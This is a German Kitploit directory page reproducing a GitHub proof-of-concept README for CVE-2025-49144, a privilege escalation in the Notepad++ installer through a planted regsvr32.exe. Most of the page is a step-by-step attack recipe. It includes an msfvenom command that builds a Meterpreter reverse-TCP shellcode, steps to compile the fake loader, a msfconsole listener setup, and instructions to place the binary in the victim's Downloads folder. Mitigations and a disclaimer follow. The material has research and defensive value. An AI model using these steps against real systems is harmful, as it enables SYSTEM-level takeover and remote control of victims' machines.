Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49144_PoC — CVE-2025-49144 PoC für Sicherheitsforscher zum Testen und Ausprobieren. | Kitploit
Tools/GitHubGitHub/thetorjancaptain/cve-2025-49144_poc
Privilege EscalationSchwachstellenanalyseExploitationLaterale BewegungPenetrationstestsLernen & BildungPayload-EntwicklungBinary-Exploitation

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
thetorjancaptain/cve-2025-49144_poc

CVE-2025-49144_PoC

CVE-2025-49144 PoC für Sicherheitsforscher zum Testen und Ausprobieren.

Repository anzeigen
882850vor 1 JahrVon Kitploit geprüft

CVE-2025-49144_PoC

PoC Ablauf

📌 CVE-2025-49144 ist eine lokale Privilegienausweitungsschwachstelle mit hohem Schweregrad, die in den Installationsprogrammen von Notepad++ v8.8.1 und früheren Versionen gefunden wurde. Diese Schwachstelle beruht auf unkontrolliertem Suchpfadverhalten für ausführbare Dateien während der Installation, wodurch ein lokaler Angreifer SYSTEM-Rechte erlangen kann, indem er schädliche ausführbare Dateien im selben Verzeichnis wie das Installationsprogramm platziert.


⚙️ Wie der CVE funktioniert – Schritt für Schritt:

🧱 1. Was ist im Installationsprogramm schiefgelaufen?

Das Notepad++-Installationsprogramm (vor v8.8.2) ruft regsvr32.exe auf, um einige Komponenten zu registrieren – tut dies aber ohne den vollständigen Pfad (wie C:\Windows\System32\regsvr32.exe).

Stattdessen führt es einfach aus:

root@kitploit:~
regsvr32.exe some_dll

📂 2. Verhalten des Windows-Suchpfads: Wenn eine ausführbare Datei ohne vollständigen Pfad gestartet wird, verwendet Windows eine bestimmte Suchreihenfolge, um die Datei zu finden:

  1. Der Ordner, aus dem die Anwendung gestartet wurde (z. B. Downloads)
  2. Der Systemordner (System32)
  3. Der Windows-Ordner
  4. Aktuelles Arbeitsverzeichnis
  5. Pfade in der PATH-Umgebungsvariable

Wenn also eine gefälschte regsvr32.exe im selben Ordner wie das Installationsprogramm (z. B. Downloads) platziert wird, verwendet Windows diese vor der echten.

💣 3. Ausnutzung:

root@kitploit:~
- Der Angreifer platziert eine schädliche regsvr32.exe im selben Ordner wie das legitime Notepad++-Installationsprogramm (z. B. im Downloads-Ordner des Opfers).

- Das Opfer führt das Installationsprogramm aus (denkt, es sei sicher).

- Das Installationsprogramm ruft regsvr32.exe auf, führt aber letztendlich die schädliche Datei aus demselben Ordner aus – mit SYSTEM-Rechten (da Installationsprogramme normalerweise Administratorberechtigungen anfordern).

- Die Nutzlast des Angreifers läuft nun als NT AUTHORITY\SYSTEM.

⚙️ Schritte zur Reproduktion:

  1. Shellcode besorgen:
root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
  1. Laden Sie die Datei "regsvr32_loader.c" herunter und bearbeiten Sie sie.
  2. Fügen Sie den gesamten Shellcode aus shellcode.txt in den genannten Kommentar ein.
  3. Kompilieren zu regsvr32.exe:
root@kitploit:~
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
  1. Einen Meterpreter-Listener bereitstellen:
root@kitploit:~
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
  1. Laden Sie eine anfällige Version von Notepad++ herunter, d.h. vor 8.8.1, da 8.8.1 jetzt automatisch aktualisiert wird. Für den PoC habe ich Notepad++ v8.6.8 verwendet.
  2. Verschieben Sie die Datei "regsvr32.exe" in das Windows-System in denselben Ordner des Notepad++-Installationsprogramms, wahrscheinlich im Ordner Downloads.
  3. Schließen Sie die Installation des Notepad++-Installationsprogramms ab.

Hinweis: Dies ist ein PoC und wurde daher bei deaktiviertem Windows Defender und Echtzeitschutz getestet.


✅ Abhilfemaßnahmen

Benutzer und Administratoren sollten:

  • Upgrade auf Notepad++ v8.8.2 oder neuer

  • Softwareinstallation auf vertrauenswürdige Administratoren beschränken

  • Verwenden Sie AppLocker, WDAC oder Softwareeinschränkungsrichtlinien (SRP) zum:

    • Blockieren der Ausführung aus benutzerbeschreibbaren Ordnern (z. B. Downloads)
    • Verhindern der Ausführung nicht vertrauenswürdiger Binärdateien wie regsvr32.exe von nicht autorisierten Pfaden
    • Erzwingen der Codesignierung für ausführbare Dateien

Sicherheitsteams sollten regelmäßig Installationspfade prüfen, Schreibberechtigungen überwachen und das Verhalten während der Installationsausführung beobachten, um die Angriffsfläche zu reduzieren.


🏷️ Lizenz

MIT-Lizenz — Nur für Bildungs-, Forschungs- und Verteidigungszwecke kostenlos.


🤝 Mitwirken

Pull-Requests sind willkommen — verbessern Sie die Erkennung, fügen Sie Funktionen hinzu oder schlagen Sie Korrekturen vor.


⚠️ Haftungsausschluss

Dieser PoC dient nur zu Bildungs- und Forschungszwecken. Verwenden Sie ihn auf eigenes Risiko. Der Autor übernimmt keine Verantwortung für Missbrauch oder verursachte Schäden.

Tool herunterladen